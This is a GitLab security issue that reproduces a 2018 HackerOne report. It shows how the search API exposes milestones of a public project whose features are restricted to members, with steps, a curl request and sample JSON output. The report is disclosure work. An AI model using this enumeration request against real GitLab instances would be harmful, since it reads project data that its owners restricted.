Milestones leaked via search API
HackerOne report #460815 by xanbanx on 2018-12-11:
GitLab allows to restrict the project features for public projects. When disabling all features of a public project for non-project members under https://gitlab.com/xanbanx/test-search/edit
, full access to milestones is still possible via the search API.
Steps To Reproduce:
Reproduced on GitLab 11.6.0-rc4-ee
- Create a public project, disable all features for non-project members by setting all features under
https://gitlab.com/xanbanx/test-search/edit
toOnly Project Members
- Create a new milestone, e.g., named
milestone
- As a non-project member perform the following API request (substitute the project id)
curl --request GET --header "PRIVATE-TOKEN: <YOUR-TOKEN>" https://gitlab.example.com/api/v4/projects/<project-id>/search?search=milestone&scope=milestones
Although the user does not have access to the project and is no project member, the API returns:
[
{
"id": 123,
"iid": 1,
"project_id": 12,
"title": "milestone",
"description": "milestone",
"state": "active",
"created_at": "2018-12-11T20:03:25.381Z",
"updated_at": "2018-12-11T20:03:25.381Z",
"due_date": null,
"start_date": null,
"web_url": "https://gitlab.example.com/namespace/project/milestones/1"
}
]
Impact
By using the search API any user with limited access can enumerate all milestones via the search API. Milestones can include critical information, e.g., related to upcoming security milestones, etc..
Security issue
Edited by Felipe Artur